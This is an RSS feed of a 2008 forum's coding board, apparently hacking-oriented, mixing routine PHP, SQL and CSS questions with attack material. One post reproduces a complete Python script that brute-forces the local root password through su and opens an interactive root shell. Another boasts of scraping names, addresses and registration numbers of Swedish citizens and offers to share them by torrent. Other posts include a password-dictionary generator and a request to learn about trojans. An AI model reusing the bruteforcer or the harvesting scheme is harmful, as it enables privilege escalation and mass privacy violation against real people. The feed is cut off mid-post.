﻿<?xml version='1.0' encoding='UTF-8'?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>BBS.PROGENIC.COM / Chat / Coding </title><generator>InstantForum.NET v4.1.2</generator><description>BBS.PROGENIC.COM</description><link>http://bbs.progenic.com/</link><webMaster>noreply@progenic.com</webMaster><lastBuildDate>Sat, 05 Jul 2008 12:10:24 GMT</lastBuildDate><ttl>20</ttl><item><title>TinyUrl - style script</title><link>http://bbs.progenic.com/Topic14210-9-1.aspx</link><description>Hi&lt;/P&gt;&lt;P&gt;Okay, I want to create my own MSW-branded tinyurl service, called jive.to!&lt;/P&gt;&lt;P&gt;I've got the domain, but I'm struggling to find a script that will do the job. Basically, take a long url, come up with a short id key, check its not taken, add it to the database, and then present the user with the new url. &lt;/P&gt;&lt;P&gt;Had a go with PHPZLink, but that just seems to break. Anyone know of anything that will do the trick? PHP / ASP.net, doesn't matter which...&lt;/P&gt;&lt;P&gt;Thanks,&lt;/P&gt;&lt;P&gt;Dan</description><pubDate>Wed, 02 Apr 2008 16:57:18 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>[PHP] Can any one tell me why this isnt working...</title><link>http://bbs.progenic.com/Topic14771-9-1.aspx</link><description>Im trying to make an app that will take user input "ip and port #" then connect to it and test it by connection to another app on the same server which just returns the IP address via $_SERVER['REMOTE_ADDR'] to see if its anonymous. the section below is just the checker section of the app. when its done it will add the ip port and type to a data base, and also make checks of the data base on demand. i cant make it work however, can you see what i did wrong??&lt;br&gt;&lt;br&gt;&lt;pre&gt;&lt;?&lt;br&gt;$do = 'add';&lt;br&gt;switch($do)&lt;br&gt;{&lt;br&gt;case add:&lt;br&gt;        $addy = '195.248.190.27'; //Proxy addr&lt;br&gt;        $port = '3128'; //Proxy port&lt;br&gt;        $type = 'Anonymous'; //hope the proxy is anon&lt;br&gt;        $sock = fsockopen($addy, $port, $errno, $errstr, 30); //connect&lt;br&gt;        if(!$sock)&lt;br&gt;        {&lt;br&gt;                die('You sure this proxy is active??'); //could not connect&lt;br&gt;        }&lt;br&gt;        //Now test the proxy&lt;br&gt;        $test = 'GET &lt;a href='http://38.119.187.37/procheck.php'&gt;http://38.119.187.37/procheck.php&lt;/a&gt; HTTP/1.1\r'; //this will forward the connection to a proxy check on the same server&lt;br&gt;        $test .= 'Host: 38.119.187.37:80\r';&lt;br&gt;        $test .= 'Connection: Close\r\r';&lt;br&gt;        fwrite($sock, $test);&lt;br&gt;        while(!feof($sock))&lt;br&gt;        {&lt;br&gt;                //if we get 38.119.187.37 back from the proxy its not anonymous&lt;br&gt;                if(fgets($sock, 128) == '38.119.187.37')&lt;br&gt;                {&lt;br&gt;                        $type = 'Transparent'; //change from anonymous to trans&lt;br&gt;                }&lt;br&gt;        }&lt;br&gt;        echo $type;&lt;br&gt;}&lt;br&gt;?&gt;&lt;/pre&gt;</description><pubDate>Sat, 21 Jun 2008 15:22:12 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>SQL Select Help...</title><link>http://bbs.progenic.com/Topic14681-9-1.aspx</link><description>I have a database that is constantly being added to... what im trying to do is select the 10 most recent entries EXCEPT for the very most recent.&lt;/P&gt;&lt;P&gt;Selecting the 10 most recent is something I can do.... 'select top 10 * from tablename order by id desc' - but how do I leave out the most recent?&lt;/P&gt;&lt;P&gt;SQL Server 2005.</description><pubDate>Sun, 08 Jun 2008 02:35:01 GMT</pubDate><dc:creator>Pen</dc:creator></item><item><title>Understanding trojan</title><link>http://bbs.progenic.com/Topic14720-9-1.aspx</link><description>I'm a newbie when it comes to the world of hacking, I'm really interested in learning all about trojan hacking, the different one of them and how each works. if it can be taught properly, PM me so we will fix a date we can chat. It's really a nice thing I found myself in mist of professional hackers. an immediate response will be appreciated.&lt;/P&gt;&lt;P&gt;thanx to y'all</description><pubDate>Wed, 11 Jun 2008 23:16:57 GMT</pubDate><dc:creator>g-maggic</dc:creator></item><item><title>www.leetupload.com</title><link>http://bbs.progenic.com/Topic10136-9-1.aspx</link><description>The point of my website, &lt;a href='http://www.leetupload.com'&gt;http://www.leetupload.com&lt;/a&gt; is to try and gain every 'hacking' or security program out there, before they eventually disappear forever. I made this page because I have always gone through much frustration trying to find a certain tool, and wondered why there wasn't one central place to store them all. Well, this is what I have been trying to do. To gain help from the community, in case I miss any programs, there is an option to upload your own tool. It is then reviewed by the admins, and then placed in the database directory.&lt;br&gt;&lt;br&gt;Just a little project I have been working on, and trying to become more well known so the project can take off and have much more interesting files uploaded.&lt;br&gt;&lt;br&gt;Tell me what you think, and what you would do to change it, etc. Many thanks in advanced! &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Smile.gif" border="0" title="Smile"&gt;</description><pubDate>Mon, 16 Apr 2007 07:58:21 GMT</pubDate><dc:creator>leetupload</dc:creator></item><item><title>Selling a website? I might be interested...</title><link>http://bbs.progenic.com/Topic14582-9-1.aspx</link><description>Hi peeps&lt;/P&gt;&lt;P&gt;I'm looking to purchase a website which makes money from Google Adsense. Here's what I'm after...&lt;/P&gt;&lt;P&gt;- something that doesn't need too much maintenance&lt;/P&gt;&lt;P&gt;- any niche, although anything music or tech related would be given more consideration&lt;/P&gt;&lt;P&gt;- nothing illegal. site and content have to be 100% legit in UK law (so no mp3 sites, p2p, etc)&lt;/P&gt;&lt;P&gt;I'm looking for something that makes around $20-30 per month (at least 3 months earnings visible), and I'm looking to pay up to £250. That's about a 10x earnings multiple.&lt;/P&gt;&lt;P&gt;Please contact me off forum with details if you have anything... info [at] godhn [dot] com&lt;/P&gt;&lt;P&gt;Thanks!</description><pubDate>Tue, 27 May 2008 07:56:13 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>No-one else knows the answer so I turn to you...</title><link>http://bbs.progenic.com/Topic14553-9-1.aspx</link><description>Problem... I have some RadioButtons within the Accordion, I want to make it so that when one of the radio buttons is selected then the user is forwarded to another page. &lt;BR&gt;Ive achieved this without the Accordion in the past, using the "autopostback=true" option and then calling a sub when a radiobutton is checked: "OnCheckChanged=name_of_sub"&lt;BR&gt;&lt;BR&gt;I try this exact same method with Radio Buttons that are within an Accordion and I get the following error: "Object reference not set to an instance of an object."&lt;BR&gt;- So I tried to declare/find the radiobutton with the following: "Dim Button1 As RadioButton = Accordion1.FindControl("Button1")"... but still I get the same error.&lt;BR&gt;&lt;BR&gt;Has anyone been able to put a radiobutton within an Accordion control?</description><pubDate>Fri, 23 May 2008 15:41:43 GMT</pubDate><dc:creator>Pen</dc:creator></item><item><title>Stealing peoples person-number's</title><link>http://bbs.progenic.com/Topic14507-9-1.aspx</link><description>&lt;b&gt;Civic Registration Number&lt;/b&gt;&lt;div class="Quote"&gt;"Everyone in Sweden who is registered with the population census authority or has a tax card is given a ten-digit civic registration number. The first six digits are the year, month and day of birth, the following three are the birth number and the last is a control number."&lt;/div&gt;&lt;br&gt;I've just finished an application that can generate those last four valid numbers, and then pump them from a database here in sweden. The result you get, is the &lt;b&gt;personal-number&lt;/b&gt;, &lt;b&gt;name&lt;/b&gt;, &lt;b&gt;sex&lt;/b&gt;, &lt;b&gt;address&lt;/b&gt; and &lt;b&gt;postcode&lt;/b&gt;.&lt;br&gt;&lt;br&gt;Soo far, i've collected about some MB's, which itself is a couple percents of the Swedish population.&lt;br&gt;&lt;br&gt;You usually need to pay for this kind of information (or being inside the government), but right now I am getting this for free &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/BigGrin.gif" border="0" title="BigGrin"&gt;&lt;br&gt;&lt;br&gt;If anyone is interested, I can make a torrent of this when I'm finished &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Smile.gif" border="0" title="Smile"&gt;&lt;br&gt;&lt;br&gt;&lt;b&gt;Screenshot (unformated):&lt;/b&gt;&lt;img src="http://bbs.progenic.com/Attachment141.aspx"&gt;&lt;br&gt;</description><pubDate>Fri, 16 May 2008 16:02:19 GMT</pubDate><dc:creator>andy</dc:creator></item><item><title>database driven website programming</title><link>http://bbs.progenic.com/Topic13970-9-1.aspx</link><description>I need your help choosing a language &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Smile.gif" border="0" title="Smile"&gt;&lt;br&gt;&lt;br&gt;Say if someone who hasn't done any programming in several years, wants to create an online community site, where people have to pay to join, with an online forum and everything - and he wants to do it himself, and rather quickly (yet secure), what language should he go for?&lt;br&gt;&lt;br&gt;I was thinking about php or ASP.net, but seriously haven't followed up on anything programming related since 2003 ... any advice is welcome &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Smile.gif" border="0" title="Smile"&gt;</description><pubDate>Wed, 05 Mar 2008 07:53:08 GMT</pubDate><dc:creator>inmate</dc:creator></item><item><title>[php] setting DNS packet flags</title><link>http://bbs.progenic.com/Topic14441-9-1.aspx</link><description>any know how to set DNS message flags in php?</description><pubDate>Sat, 03 May 2008 22:21:07 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>[php] dictionary generator</title><link>http://bbs.progenic.com/Topic14356-9-1.aspx</link><description>Hey im trying to make a dictionary generator in php and i have a working beta ver that takes a length provided by the user that writes to a file upper or lower case char sets, with each set on a new line&lt;br&gt;&lt;br&gt;so it uot puts like:&lt;br&gt;aaa&lt;br&gt;aab&lt;br&gt;aac&lt;br&gt;&lt;br&gt;or&lt;br&gt;&lt;br&gt;AAA&lt;br&gt;AAB&lt;br&gt;AAC&lt;br&gt;&lt;br&gt;Im not really sure how to mix lower and upper case chars or how to add digits special chars or spaces. Any ideas??&lt;br&gt;&lt;br&gt;Heres my code so far.&lt;br&gt;&lt;br&gt;&lt;pre&gt;PW length: &lt;input type="text" name="max"&gt;&lt;BR&gt;&lt;br&gt;::Case::&lt;BR&gt;&lt;br&gt;Lower: &lt;input type="checkbox" name="case" value="a"&gt;&lt;BR&gt;&lt;br&gt;Upper: &lt;input type="checkbox" name="case" value="A"&gt;&lt;BR&gt;&lt;br&gt;&lt;input type="submit"&gt;&lt;HR&gt;&lt;br&gt;&lt;?&lt;br&gt;if($_GET['max'] != '')&lt;br&gt;{&lt;br&gt;$pwl = $_GET['max'];&lt;br&gt;$pwn = '0';&lt;br&gt;$num = '';&lt;br&gt;while($pwn != $pwl)&lt;br&gt;{&lt;br&gt;        $num .= $_GET['case'];&lt;br&gt;        $pwn++;&lt;br&gt;}&lt;br&gt;//echo $num;&lt;br&gt;$sum = array();&lt;br&gt;$sumn = '0';&lt;br&gt;while($sumn != $pwl)&lt;br&gt;{&lt;br&gt;        array_push($sum, '26');&lt;br&gt;        $sumn++;&lt;br&gt;}&lt;br&gt;$i = '0';&lt;br&gt;$file = fopen('pwl.dic', 'w+');&lt;br&gt;while($i != array_product($sum))&lt;br&gt;{&lt;br&gt;        fputs($file, '$num');&lt;br&gt;        $i++;&lt;br&gt;        $num++;&lt;br&gt;}&lt;br&gt;fclose($file);&lt;br&gt;echo '&lt;a href="/pwl.dic"&gt;Download you PW list&lt;/a&gt;';&lt;br&gt;}&lt;br&gt;?&gt;&lt;/pre&gt;</description><pubDate>Fri, 18 Apr 2008 21:32:38 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>Conditional Image resize script</title><link>http://bbs.progenic.com/Topic14230-9-1.aspx</link><description>I need some php pointers&lt;br&gt;If anyone has something like this please share&lt;br&gt;I need a script that when you add an image and it creates a thumb to it it will also resize images that are bigger then a given number of pixels&lt;br&gt;If anyone knows or has anything like this please share</description><pubDate>Thu, 03 Apr 2008 09:06:32 GMT</pubDate><dc:creator>_Infernal_</dc:creator></item><item><title>dynamic file-execution</title><link>http://bbs.progenic.com/Topic14186-9-1.aspx</link><description>Hello guys&lt;br&gt;&lt;br&gt;I just wonder if it's possible to execute the content of a variable in C++?&lt;br&gt;The variable contents is binary data.&lt;br&gt;&lt;br&gt;edit: and how can I do this practically?</description><pubDate>Sat, 29 Mar 2008 16:40:27 GMT</pubDate><dc:creator>andy</dc:creator></item><item><title>Linux-y wordpress theme</title><link>http://bbs.progenic.com/Topic13928-9-1.aspx</link><description>Hi gang&lt;/P&gt;&lt;P&gt;As some, many or all of you may know, I've developed a penchant for blogging lately. I'm setting up a network of tech-based blogs,...&lt;/P&gt;&lt;P&gt;&lt;A target='_Blank' href="http://www.AdventuresInVista.com"&gt;www.AdventuresInVista.com&lt;/A&gt;&lt;BR&gt;&lt;A target='_Blank' href="http://www.AdventuresInMacOS.com"&gt;www.AdventuresInMacOS.com&lt;/A&gt;&lt;/P&gt;&lt;P&gt;...and of course &lt;A target='_Blank' href="http://www.AdventuresInLinux.com"&gt;www.AdventuresInLinux.com&lt;/A&gt; (not live)&lt;/P&gt;&lt;P&gt;This third one is vexing me slightly. &lt;/P&gt;&lt;P&gt;As you can see from Vista and MacOS, both themes follow a "os-style window" design. They "look" kinda like the OS. All the blogs are Wordpress-based, and I've "borrowed" the themes.&lt;/P&gt;&lt;P&gt;I've been looking for one for Linux. I want to follow the same pattern, with a site that "looks kinda like a linux desktop/window". As yet, I haven't found anything that does the job.&lt;/P&gt;&lt;P&gt;Just thought I'd put a call out to you guys to see if you know of any themes that may be suitable!?&lt;/P&gt;&lt;P&gt;Thanks,&lt;/P&gt;&lt;P&gt;&lt;BR&gt;Dan</description><pubDate>Sat, 01 Mar 2008 17:32:04 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>Computer Programming help for class.</title><link>http://bbs.progenic.com/Topic14200-9-1.aspx</link><description>This is my first year of computer programming and will be my last in high school.  Last 9 weeks I came up with a  73% C.....which I usually make a 3.5 GPA overall so it really sucked.  I need help ladies and gentlemen.  &lt;br&gt;&lt;br&gt;Basically, I can ask my teacher for help, but he shrugs his shoulders and walks away.  That or he'll explain a bunch a shit that doesn't make since.  I feel like I'm lost, I really do.&lt;br&gt;&lt;br&gt;&lt;i&gt;Here's my latest assignment.&lt;/i&gt;&lt;a href="http://img221.imageshack.us/my.php?image=img001ww2.jpg" target="_blank" class="SmlLinks"&gt;&lt;img src="http://img221.imageshack.us/img221/6706/img001ww2.th.jpg"&gt;&lt;/a&gt;&lt;i&gt;We are learning C++ and we use C++ Builder 4.  Below is my current form/application of project 2 of my assignment so far.&lt;/i&gt;&lt;a href="http://img85.imageshack.us/my.php?image=proj2qw0.jpg" target="_blank" class="SmlLinks"&gt;&lt;img src="http://img85.imageshack.us/img85/2725/proj2qw0.th.jpg"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;u&gt;FINALLY, here is my code for that "generate" button (Button1).&lt;/u&gt;&lt;br&gt;#include &lt;stdlib.h&gt;&lt;br&gt;&lt;br&gt;void __fastcall TForm1::Button1Click(TObject *Sender)&lt;br&gt;{&lt;br&gt;  int a, b, c;&lt;br&gt;&lt;br&gt;  a = Edit1-&gt;Text.ToInt();&lt;br&gt;&lt;br&gt;  c = 0;&lt;br&gt;&lt;br&gt;&lt;br&gt;  while (b != a)&lt;br&gt;  {&lt;br&gt;    b = random (100) + 1;&lt;br&gt;    Label4-&gt;Caption = Label4-&gt;Caption + b;&lt;br&gt;    c++;&lt;br&gt;  }&lt;br&gt;    Label4-&gt;Caption = Label4-&gt;Caption +, " ";&lt;br&gt;}&lt;br&gt;//---------------------------------------------------------------------------&lt;br&gt;void __fastcall TForm1::FormCreate(TObject *Sender)&lt;br&gt;{&lt;br&gt;  randomize();        &lt;br&gt;}&lt;br&gt;//---------------------------------------------------------------------------</description><pubDate>Mon, 31 Mar 2008 20:03:07 GMT</pubDate><dc:creator>Sorrow667</dc:creator></item><item><title>Local Root BruteForcer</title><link>http://bbs.progenic.com/Topic14016-9-1.aspx</link><description>Check Post for more info: &lt;a href='http://forum.darkc0de.com/index.php?action=vthread&amp;forum=8&amp;topic=1571'&gt;http://forum.darkc0de.com/index.php?action=vthread&amp;forum=8&amp;topic=1571&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;pre&gt;#!/usr/bin/python &lt;br&gt;#Local Root BruteForcer &lt;br&gt; &lt;br&gt;#http://www.darkc0de.com &lt;br&gt;#d3hydr8[at]gmail[dot]com &lt;br&gt; &lt;br&gt;import sys &lt;br&gt;try: &lt;br&gt;import pexpect &lt;br&gt;except(ImportError): &lt;br&gt;print "You need the pexpect module." &lt;br&gt;print "http://www.noah.org/wiki/Pexpect" &lt;br&gt;sys.exit(1) &lt;br&gt; &lt;br&gt;#Change this if needed. &lt;br&gt;LOGIN_ERROR = 'su: incorrect password' &lt;br&gt; &lt;br&gt;def brute(word): &lt;br&gt;print "Trying:",word &lt;br&gt;child = pexpect.spawn ('su') &lt;br&gt;child.expect ('Password: ') &lt;br&gt;child.sendline (word) &lt;br&gt;i = child.expect (['.+\s#\s',LOGIN_ERROR]) &lt;br&gt;if i  == 0: &lt;br&gt;print "\t[!] Root Password:",word &lt;br&gt;child.sendline ('whoami') &lt;br&gt;print child.before &lt;br&gt;child.interact() &lt;br&gt;#if i == 1: &lt;br&gt;#print "Incorrect Password" &lt;br&gt; &lt;br&gt;if len(sys.argv) != 2: &lt;br&gt;print "Usage : ./rootbrute.py &lt;wordlist&gt;" &lt;br&gt;print "Eg: ./rootbrute.py words.txt" &lt;br&gt;sys.exit(1) &lt;br&gt; &lt;br&gt;try: &lt;br&gt;words = open(sys.argv[1], "r").readlines() &lt;br&gt;except(IOError): &lt;br&gt;  print "Error: Check your wordlist path" &lt;br&gt;  sys.exit(1) &lt;br&gt; &lt;br&gt;print "[+] Loaded:",len(words),"words" &lt;br&gt;print "[+] BruteForcing..." &lt;br&gt;for word in words: &lt;br&gt;brute(word.replace("","")) &lt;/pre&gt;</description><pubDate>Tue, 11 Mar 2008 19:41:55 GMT</pubDate><dc:creator>d3hydr8</dc:creator></item><item><title>anybody wanna finish my website rebuild?</title><link>http://bbs.progenic.com/Topic14009-9-1.aspx</link><description>I've been working on a rebuild of one of my main sites over the last few months. It's going really slowly. I this is due to a number of factors...&lt;/P&gt;&lt;UL&gt;&lt;LI&gt;im so bored of programming. after 17 years, im just kinda coded-out&lt;/LI&gt;&lt;LI&gt;ive done it all before, im only doing it again cos the site needs a redesign&lt;/LI&gt;&lt;LI&gt;ive got loads of other projects, and so much to do!!&lt;/LI&gt;&lt;/UL&gt;&lt;P&gt;I've had the thing designed. The barebones are all there... the basic pages, the styling, the 'concept art'. A lot of it is even coded up. But I need the damn thing finished so I can get back on track.&lt;/P&gt;&lt;P&gt;I'm thinking of going on Rent-A-Coder to get someone to finish it off for me... it needs tidying up, a few things doing.. a user profile admin thingy, and a backend admin site, plus building of shopping cart system and affiliate system. &lt;/P&gt;&lt;P&gt;Just thought I'd post on here to see if anyone was interested in finishing it off for/with me? In return for beer tokens, obviously. It's all asp.net (.net 2.0.50727), with vaguely semantic xhtml, css, etc.&lt;/P&gt;&lt;P&gt;PM for details if interested.&lt;/P&gt;&lt;P&gt;- godhn -</description><pubDate>Sun, 09 Mar 2008 16:36:31 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>Car Trader</title><link>http://bbs.progenic.com/Topic13901-9-1.aspx</link><description>OK, so looks like I'll have some free time coming up on this.&lt;/P&gt;&lt;P&gt;I'll be executing a car trader for the country of Lebanon.&lt;BR&gt;Since I know jack-all about ASP and only have a Linux server (yes, I'm cheap) I'll be going the MySQL / PHP route.&lt;/P&gt;&lt;P&gt;This is what it will contain.&lt;BR&gt;Account management where a user will add / edit / remove listings.&lt;BR&gt;I know how to do the listing, just the account management to load each ones personal stuff will be something new for me.&lt;/P&gt;&lt;P&gt;Searching by&lt;BR&gt;Model / Location / Price.&lt;/P&gt;&lt;P&gt;Now since there are WAY too many f'in car makes to list I was thinking that I will have people fill in&lt;BR&gt;Car Make : ex. BMW&lt;BR&gt;Car Model: ex. 520i&lt;/P&gt;&lt;P&gt;Because if I make it a drop down list, or something else...I'll be sure to miss some cars. What do you all think?&lt;/P&gt;&lt;P&gt;I'm hoping to make this something huge. I believe it will be...</description><pubDate>Fri, 29 Feb 2008 16:28:30 GMT</pubDate><dc:creator>Beezer</dc:creator></item><item><title>horizontal rule</title><link>http://bbs.progenic.com/Topic13817-9-1.aspx</link><description>Hey every1,&lt;/P&gt;&lt;P&gt;Does anyone know the styling details for a default &amp;lt;hr&amp;gt; ?!&lt;/P&gt;&lt;P&gt;I've restyled it for my most of my site, but there are a couple of places where I want an original stylee one rather than the one I've made.&lt;/P&gt;&lt;P&gt;Anyone know what the CSS is for a "real" horizontal rule, or some way of overriding my style to say "do not employ the style" - obviously I could class my designed one, but there are more instances of that than i want with the "default" stylee.&lt;/P&gt;&lt;P&gt;Any suggestions?</description><pubDate>Mon, 18 Feb 2008 07:00:52 GMT</pubDate><dc:creator>godhn</dc:creator></item><item><title>Code to bann from certain address</title><link>http://bbs.progenic.com/Topic13840-9-1.aspx</link><description>Anyone know something like this ?&lt;br&gt;ban redirect give of a certain message ?</description><pubDate>Fri, 22 Feb 2008 17:31:36 GMT</pubDate><dc:creator>_Infernal_</dc:creator></item><item><title>C++ and libraries</title><link>http://bbs.progenic.com/Topic13847-9-1.aspx</link><description>Im about to do an application, which needs the Curl library (&lt;A target='_Blank' href="http://curl.haxx.se/download.html"&gt;http://curl.haxx.se/download.html&lt;/A&gt;). The thing is, that I need the application to be static compiled with it.&lt;P&gt;You might ask yourself, why? Because I want the application to be able to run on any system, without needs of 100 .dll's to be installed first. If this makes the program 10-times bigger, so be it. That's not a problem.&lt;/P&gt;&lt;P&gt;I have beed able to accomplish this on linux, with just a single line of text in the makefile: `curl-config --static-lib`. Short and sweet, isn't it?&lt;/P&gt;&lt;P&gt;Now, how do you do this in windows, cause I just can't get this to work out? You know, it's really frustrating. &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/1cab978f-b1f5-4231-b243-c451.gif" border="0" title="Grr"&gt;</description><pubDate>Sat, 23 Feb 2008 09:05:23 GMT</pubDate><dc:creator>andy</dc:creator></item><item><title>Usernames</title><link>http://bbs.progenic.com/Topic13827-9-1.aspx</link><description>Does anybody know any security risks of allowing special chars in usernames?&lt;/P&gt;&lt;P&gt;Large sites suffer because people can't get desired usernames so it would make sense to me to allow things like pr♣ge.</description><pubDate>Wed, 20 Feb 2008 08:42:48 GMT</pubDate><dc:creator>proge</dc:creator></item><item><title>trying to get my Zoner zew1602 wireless pci cars to work with uduntu</title><link>http://bbs.progenic.com/Topic13815-9-1.aspx</link><description>i am gust startin the transion for XP to ubuntu and the net work card i have is not linux frendly i have hired that it will work but nouthin i have tried has worked so far and i hope that some one can help me &lt;A class=SmlLinks id=ctlPanelBar_ctlEmotIcons__ctl27_hypEmotIconLink &amp;#111;nclick="if_InsertEmotIconFromPopup('&lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Exclamation.gif" border="0" title="Exclamation"&gt;')" href="http://bbs.progenic.com/Skins/OldSkool/Dialogs/InsertEmotIcon.aspx?ControlID=txtPost#"&gt;&lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Exclamation.gif" border="0" title="Exclamation"&gt;&lt;/A&gt;&lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/Sad.gif" border="0" title="Sad"&gt;</description><pubDate>Sun, 17 Feb 2008 11:58:52 GMT</pubDate><dc:creator>raz_one</dc:creator></item><item><title>Some php help please</title><link>http://bbs.progenic.com/Topic13173-9-1.aspx</link><description>I am having trouble with a referals tracking script i got and edited ...&lt;br&gt;does anyone have a script in php that counts all referals to a page and shows them domain only with link and number of hits sent that i can have in my homepage to show ho is sending me hits ? &lt;br&gt;&lt;br&gt;Anyways please some help if no one has anything like this then i will post the one i got and maybe you can tell me why in hell it does not work&lt;br&gt;&lt;br&gt;thanks</description><pubDate>Sun, 30 Dec 2007 18:10:16 GMT</pubDate><dc:creator>_Infernal_</dc:creator></item><item><title>make a socket &amp; listen</title><link>http://bbs.progenic.com/Topic13458-9-1.aspx</link><description>im trying to open a port on 1900 then echo every thing that comes in but only while the script is running. below is what i have but its not working any ideas?&lt;/P&gt;&lt;P&gt;&lt;pre&gt;&amp;lt;?php&lt;BR&gt;$p = 1900;&lt;BR&gt;$socket = socket_create(AF_INET, SOCK_RAW, 2);&lt;BR&gt;socket_bind($socket, "127.0.0.1", $p);&lt;BR&gt;socket_listen($socket);&lt;BR&gt;$socketout = socket_accept($socket);&lt;BR&gt;"..."&lt;BR&gt;socket_close($socket);&lt;BR&gt;echo $socketout;&lt;BR&gt;?&amp;gt;&lt;/pre&gt;</description><pubDate>Sun, 13 Jan 2008 18:07:15 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>A idea i need help with</title><link>http://bbs.progenic.com/Topic13275-9-1.aspx</link><description>Ok i want to try something new and i need some help &lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/BigGrin.gif" border="0" title="BigGrin"&gt;&lt;br&gt;i need to have a code that pulls out random peaces of text out of a notepad file&lt;br&gt;let's say a file with 100 jokes that are separated by let's say ------&lt;br&gt;i would want a code that pulls out a joke at a time or a random joke each time the page is opened&lt;br&gt;why not use sql you ask ?&lt;br&gt;why don't you get a script that does this with sql you ask ?&lt;br&gt;well i am saving up the sql computing power this will have a few jokes in it and i get a lot of hits on that page ..enough so that an sql script that does this would be felt all round the site&lt;br&gt;&lt;br&gt;anyone know how to do this ?&lt;br&gt;or something that shows the text in a .txt file and picks randomly fom the text of more notepad files in a folder&lt;br&gt;and shows the whole text in one &lt;br&gt;&lt;br&gt;&lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/79b50927-be5b-4513-9da5-eba0.gif" border="0" title="Animated"&gt;&lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/79b50927-be5b-4513-9da5-eba0.gif" border="0" title="Animated"&gt;&lt;img align="absmiddle" src="http://bbs.progenic.com/Skins/Common/EmotIcons/79b50927-be5b-4513-9da5-eba0.gif" border="0" title="Animated"&gt;</description><pubDate>Sat, 05 Jan 2008 18:56:40 GMT</pubDate><dc:creator>_Infernal_</dc:creator></item><item><title>The Laziest Way</title><link>http://bbs.progenic.com/Topic13239-9-1.aspx</link><description>Allright, I have a website which lists houses for sale and houses that are sold. The client now wants to make that section editable so he can add/edit/remove houses and move them from "for sale" to "houses sold" without a lot of work. My idea is this.&lt;/P&gt;&lt;P&gt;1 DB. 1 Table. Fields include.&lt;BR&gt;Address of Home&lt;BR&gt;Home Specs&lt;BR&gt;Image URL&lt;BR&gt;Original Price&lt;BR&gt;Final Price&lt;BR&gt;Status (sold or not, will not appear to user)&lt;/P&gt;&lt;P&gt;He'll add the information into the DB through PHP, Now for the house list to be updated. I'll just have the page list them either Alphabetically through Address and matching status, or allow a user to search the home specs and list the homes that match. And if the house becomes sold, he'll just go back to editing it and from the drop down change the status to "Sold" instead of "Sale" and it won't appear in the list anymore.&lt;/P&gt;&lt;P&gt;I think that's the most effiecient (quickest) way to do it. What do you guys think, is there an easier way? I just wanna get it done with. I've been putting it aside for too long.</description><pubDate>Fri, 04 Jan 2008 05:36:12 GMT</pubDate><dc:creator>Beezer</dc:creator></item><item><title>js function</title><link>http://bbs.progenic.com/Topic13209-9-1.aspx</link><description>can a function in js call another function from outside that function.</description><pubDate>Wed, 02 Jan 2008 16:10:03 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>js help</title><link>http://bbs.progenic.com/Topic13032-9-1.aspx</link><description>can someone tell me why this is working?&lt;/P&gt;&lt;P&gt;&lt;pre&gt;&amp;lt;script type="text/javascript"&amp;gt;&lt;BR&gt;&amp;#100;ocument.write("y0 y0 y0&amp;lt;BR&amp;gt;");&lt;BR&gt;&amp;#100;ocument.write(navigator.cpuClass + "&amp;lt;br&amp;gt;");&lt;BR&gt;&amp;#100;ocument.write(navigator.appName + "&amp;lt;BR&amp;gt;");&lt;BR&gt;os = navigator.platForm;&lt;BR&gt;if (os == "Win32");&lt;BR&gt; {&lt;BR&gt; &amp;#100;ocument.write("haha, your using winblows");&lt;BR&gt; }&lt;BR&gt; else&lt;BR&gt; {&lt;BR&gt; &amp;#100;ocument.write("well at lest your not using winblows");&lt;BR&gt; }&lt;BR&gt;&amp;lt;/script&amp;gt;&lt;/pre&gt;</description><pubDate>Wed, 19 Dec 2007 11:48:14 GMT</pubDate><dc:creator>Anarchy Angel</dc:creator></item><item><title>CSS is gay</title><link>http://bbs.progenic.com/Topic12793-9-1.aspx</link><description>I really hate CSS - stupid invention. Honestly what was wrong with tables? Couldn't they just have made screenreaders understand tables? Would have been a lot easier...&lt;/P&gt;&lt;P&gt;Anyway...&lt;/P&gt;&lt;P&gt;I have the following..&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;&lt;pre&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;&amp;lt;div id="content"&amp;gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;&amp;lt;div id="leftContent"&amp;gt; .. blah .. &amp;lt;/div&amp;gt;&lt;/FONT&gt;&lt;/P&gt;&lt;FONT size=2&gt;&lt;/FONT&gt;&lt;FONT color=#0000ff size=2&gt;&lt;P&gt;&lt;FONT color=#111111&gt;&amp;lt;div id="centerContent"&amp;gt; .. blah .. &amp;lt;/div&amp;gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;&amp;lt;div id="rightContent"&amp;gt; .. blah .. &amp;lt;/div&amp;gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT color=#111111&gt;&amp;lt;/div&amp;gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P&gt;&lt;FONT 